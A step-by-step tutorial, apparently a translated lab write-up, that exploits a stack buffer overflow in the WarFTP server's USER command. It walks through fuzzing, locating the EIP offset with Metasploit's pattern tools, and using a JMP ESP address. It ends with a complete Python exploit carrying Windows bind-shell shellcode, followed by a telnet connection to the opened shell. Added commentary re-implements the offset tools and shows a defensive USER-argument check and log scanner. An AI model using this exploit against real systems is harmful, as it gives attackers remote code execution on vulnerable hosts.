1. Tools
- OllyDbg as the debugger
- a fuzzer for the fuzzing process
- Python, to write the fuzzer and the exploit
2. Install and run the WarFTP application, then bring it online (Properties --> Start Service, so the status becomes idle).
3. I will try to connect to the FTP service with netcat on port 21:
root@bt:~# nc 192.168.56.101 21
4. Fuzzing. I will write the fuzzer in Python, using the KWrite editor, and save it under the name warftpfuzzer.py.
6. Run warftpfuzzer.py:
root@bt:~# python warftpfuzzer.py
If warftpfuzzer.py succeeds, the application will crash.
7. Debugger.
Use OllyDbg to debug WarFTP, then run the fuzzer again:
root@bt:~# python warftpfuzzer.py
If it succeeds, the crash looks like this:
the registers ESP, EDI, EBP and EIP are overwritten with AAAA, i.e. 41414141 (A in hex is 41).
8. Use the Metasploit framework to create a cyclic pattern:
root@bt:/pentest/exploits/framework/tools# ./pattern_create.rb 1000 > string_pattern.txt
Then open string_pattern.txt to use the pattern string (we will see 1000 characters, from "Aa0" up to "Bh2B").
Open warftpfuzzer.py and edit it (copy the characters from string_pattern.txt into the variable buffer).
Then run warftpfuzzer.py again to crash the application once more and look at the registers.
Use pattern_offset.rb to calculate how many bytes lie between the beginning of the pattern and the value that landed in each register:
root@bt:/pentest/exploits/framework/tools# ./pattern_offset.rb 32714131 --> from register EIP
the result is 485
root@bt:/pentest/exploits/framework/tools# ./pattern_offset.rb q4Aq5Aq --> from register ESP
the result is 493
From this we know that register EIP is overwritten by 4 bytes, namely bytes 486, 487, 488 and 489.
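As an added illustration that is not part of the original post, the following Python re-implements what pattern_create.rb and pattern_offset.rb do in step 8 (and the little-endian conversion used later in step 11), so the offsets 485 and 493 above can be checked without Metasploit. The function names are mine; the EIP value 32714131, the ESP fragment q4Aq5Aq and the address 7C9D30D7 are the ones from the post.

```python
import string
import struct

# Re-implementation (not the Metasploit tools themselves) of the cyclic
# pattern emitted by pattern_create.rb and the lookup done by pattern_offset.rb.


def pattern_create(length):
    """Return `length` characters of the Metasploit-style cyclic pattern.

    The pattern is the sequence of 3-character groups <Upper><lower><digit>,
    "Aa0Aa1...Aa9Ab0...Zz9", cut to the requested length.  No group repeats,
    so a 4-byte value read out of a register locates one position in it.
    """
    out = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out.append(upper + lower + digit)
                if len(out) * 3 >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]


def register_to_search_string(value):
    """Turn a 32-bit register value as shown in the debugger (e.g. 0x32714131)
    into the 4 characters that were actually stored in memory.  x86 is
    little-endian, so the byte order is reversed: 0x32714131 -> "1Aq2"."""
    return struct.pack("<I", value).decode("ascii")


def pattern_offset(pattern, needle):
    """Return the index of `needle` in `pattern`, or -1 if it is absent.
    `needle` may be a string fragment (as read from ESP) or an integer
    register value (as read from EIP)."""
    if isinstance(needle, int):
        needle = register_to_search_string(needle)
    return pattern.find(needle)


def to_little_endian(address):
    """Step 11 of the post: encode an address as the raw bytes that have to be
    placed in the buffer, e.g. 0x7C9D30D7 -> b'\\xd7\\x30\\x9d\\x7c'."""
    return struct.pack("<I", address)


if __name__ == "__main__":
    pat = pattern_create(1000)
    print(pat[:12], "...", pat[-6:])
    print("EIP 0x32714131 ->", pattern_offset(pat, 0x32714131))  # 485
    print("ESP q4Aq5Aq    ->", pattern_offset(pat, "q4Aq5Aq"))   # 493
    print(to_little_endian(0x7C9D30D7))                         # b'\xd7\x30\x9d\x7c'
```

The 1000-character pattern ends in "Bh2B" exactly as the post says, and looking up the two register values reproduces 485 for EIP and 493 for ESP; the gap between them (8 bytes) is why the post later pads with a few bytes before the NOP sled.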
9. Now I will try to write to the location ESP points at, because ESP points to temporary data storage in memory (the stack), which allows the payload to be placed on the stack.
Edit warftpfuzzer.py and run it again to see the crash.
10. JMP ESP. Use the ESP register as an intermediary to reach the buffer in memory, because EIP cannot be pointed directly at the stack (the buffer memory).
The JMP instruction transfers execution to another address; JMP ESP transfers it to the address held in the ESP register.
JMP ESP is an instruction that already exists inside the application's loaded modules and is used here to continue execution inside the buffer.
Register EIP --> memory address holding the instruction JMP ESP --> register ESP --> buffer (stack) --> exploit PAYLOAD.
11. Then try to find a JMP ESP instruction in the application's memory.
In OllyDbg open the menu View --> Executable modules, then double-click shell32.dll.
This is the result:
Then convert the offset address to little-endian format: 7C9D30D7 becomes \xD7\x30\x9D\x7C.
After that, edit warftpfuzzer.py and change the line buffer+= "\xEF\xBE\xAD\xDE" to buffer+= "\xD7\x30\x9D\x7C", like this:
Then run WarFTP, OllyDbg and warftpfuzzer.py again.
12. Open the Metasploit web interface to create the payload:
root@bt:/pentest/exploits/framework2# ./msfweb
Then open a browser, go to http://127.0.0.1:55555/ and choose Payloads.
After that choose Windows Bind Shell and set the options like this.
Then generate it; I got this result:
13. Copy the result and paste it into the fuzzer script, like this:
#!/usr/bin/python
# warftpfuzzer.py, final version: filler + JMP ESP address + NOP sled + payload.
# Bytes literals are used so the script sends the same raw bytes under Python 2.6+ and Python 3.
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# original fuzzer payload: 1000 x "A"
#buffer = b"\x41"*1000

buffer = b"\x90"*485                  # filler up to the saved EIP (offset 485 from pattern_offset.rb)
buffer += b"\xD7\x30\x9D\x7C"         # 0x7C9D30D7, JMP ESP in shell32.dll, little-endian
#buffer += b"\x90"*(493-len(buffer))
#buffer += b"\xCC"*(1000-len(buffer))
buffer += b"\x90"*32                  # NOP sled in front of the payload
# windows bind shell payload generated with msfweb (connected to on port 4444 in step 14)
buffer += b"\xbe\x34\xdf\x34\x30\xdb\xd0\x29\xc9\xb1\x51\xd9\x74\x24\xf4\x58"
buffer += b"\x31\x70\x12\x03\x70\x12\x83\xdc\x23\xd6\xc5\xe0\xb6\xfc\x6b\xf0"
buffer += b"\xbe\xfc\x8b\xff\x21\x88\x18\xdb\x85\x05\xa5\x1f\x4d\x65\x23\x27"
buffer += b"\x50\x79\xa0\x98\x4a\x0e\xe8\x06\x6a\xfb\x5e\xcd\x58\x70\x61\x3f"
buffer += b"\x91\x46\xfb\x13\x56\x86\x88\x6c\x96\xcd\x7c\x73\xda\x39\x8a\x48"
buffer += b"\x8e\x99\x5b\xdb\xcb\x69\xc4\x07\x15\x85\x9d\xcc\x19\x12\xe9\x8d"
buffer += b"\x3d\xa5\x06\x32\x12\x2e\x51\x58\x4e\x2c\x03\x63\xbf\x97\xa7\xe8"
buffer += b"\x83\x17\xa3\xae\x0f\xd3\xc3\x32\xbd\x68\x63\x42\xe3\x06\xea\x1c"
buffer += b"\x15\x3b\xa2\x5f\xff\xa5\x10\xf9\x68\x19\xa5\x6d\x1e\x2e\xfb\x32"
buffer += b"\xb4\x2f\x2b\xa4\xff\x3d\x30\x0f\x50\x41\x1f\x30\xd9\x58\xc6\x4f"
buffer += b"\x34\xaa\x05\x1a\xad\xa9\xf6\x74\x59\x77\x01\x81\x37\xd0\xed\xbf"
buffer += b"\x1b\x8c\x42\x6c\xcf\x71\x36\xd1\xbc\x8a\x68\xb3\x2a\x64\xd5\x5d"
buffer += b"\xf8\x0f\x04\x34\x96\xab\xdd\x46\xa0\xe3\x1e\x70\x44\x1c\xb0\x29"
buffer += b"\x66\xcc\x5a\x75\x35\xc3\x73\x22\xb9\xca\xd7\x99\xba\x23\xbf\xc4"
buffer += b"\x0c\x42\x09\x51\x70\x9c\xda\x09\xda\x74\x24\x61\x71\x1e\x3d\xf8"
buffer += b"\xb0\xa6\x96\x05\xea\x0c\xe6\x29\x75\xc5\x7c\xaf\x12\x7a\x10\xa6"
buffer += b"\x06\x16\xba\xe1\xe1\x2b\xb3\xf6\x98\xf7\x4d\x1a\x6d\x38\xbe\x70"
buffer += b"\x70\xfa\x6c\x7a\xcf\xd7\xfd\x0f\xaa\x1f\xa9\xa4\xe0\x08\xdf\x44"
buffer += b"\x45\xde\xe0\xcd\xee\x20\xc8\x76\xb8\x8c\xa4\xd9\x17\x5b\x46\x88"
buffer += b"\xc6\xce\x19\xd5\x39\x98\x34\xf0\xbf\x97\x14\xfd\x16\x4d\x64\xfe"
buffer += b"\xa0\x6d\x4a\x8b\x98\x6d\xe8\x4f\x42\x71\x39\x1d\x74\x5d\xae\xdf"
buffer += b"\x52\xbc\x5c\x4c\x9c\x97\x5c\xa2"

s.connect(('192.168.56.101', 21))
data = s.recv(1024)                   # read the FTP banner
print("sending ... ")
s.send(b'USER ' + buffer + b'\r\n')   # the overlong USER argument is what overflows the stack
data = s.recv(1024)
s.send(b'PASS PASSWORD ' + b'\r\n')
s.close()
print("Finish")
14. Run WarFTP and warftpfuzzer.py again, this time without OllyDbg, to make sure WarFTP crashes like this, then connect to the bind shell:
root@bt:~# telnet 192.168.56.101 4444
Well.... my exploit succeeded....
And don't forget to give thanks to my God .... :D
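From the defender's side, the whole chain above works only because the server accepts a USER argument far longer than it can hold. The following Python 3 snippet is an added example (it is not from the post and not WarFTP's code) of the check a server should make on the USER argument before copying it anywhere, plus the same check applied to a constructed FTP session log so that a line like the one the fuzzer sends is flagged. The 64-byte limit, the function names and the sample lines are my assumptions.

```python
# Added example: server-side guard and log check for an overlong FTP USER argument.
# Assumption: a real username is never longer than MAX_USER_LEN bytes.
MAX_USER_LEN = 64
NOP = b"\x90"          # the NOP byte the post's script uses for its sled


def parse_ftp_command(line):
    """Split one raw FTP command line (bytes, with or without CRLF) into
    (verb, argument). Returns (None, b'') for an empty line."""
    line = line.rstrip(b"\r\n")
    if not line:
        return None, b""
    verb, _, arg = line.partition(b" ")
    return verb.upper(), arg


def check_user_argument(arg):
    """Return the list of reasons a USER argument is suspicious; [] means it passed."""
    reasons = []
    if len(arg) > MAX_USER_LEN:
        reasons.append("length %d exceeds %d" % (len(arg), MAX_USER_LEN))
    if any(b < 0x20 or b > 0x7E for b in arg):
        reasons.append("non-printable bytes present")
    if NOP * 8 in arg:
        reasons.append("run of 0x90 bytes (NOP sled)")
    return reasons


def handle_command(line):
    """Minimal hardened handler: reject a bad USER argument before it is stored.
    Returns the FTP reply line as bytes."""
    verb, arg = parse_ftp_command(line)
    if verb == b"USER":
        if check_user_argument(arg):
            return b"501 Syntax error in parameters or arguments\r\n"
        return b"331 User name okay, need password\r\n"
    return b"500 Syntax error, command unrecognized\r\n"


def scan_session(lines):
    """Run the USER check over captured command lines; returns (line number, reason) pairs."""
    findings = []
    for number, line in enumerate(lines, 1):
        verb, arg = parse_ftp_command(line)
        if verb == b"USER":
            for reason in check_user_argument(arg):
                findings.append((number, reason))
    return findings


# Constructed sample session: a normal login followed by the fuzzer's 1000 x "A" USER line.
SAMPLE_SESSION = [
    b"USER anonymous\r\n",
    b"PASS guest\r\n",
    b"USER " + b"A" * 1000 + b"\r\n",
]

if __name__ == "__main__":
    for line in SAMPLE_SESSION:
        print(handle_command(line).decode().strip())
    print(scan_session(SAMPLE_SESSION))   # [(3, 'length 1000 exceeds 64')]
```

The length check alone stops the overflow; the two extra checks exist so that a log review can tell a typo'd username from a sled-and-payload blob, which would trip all three at once.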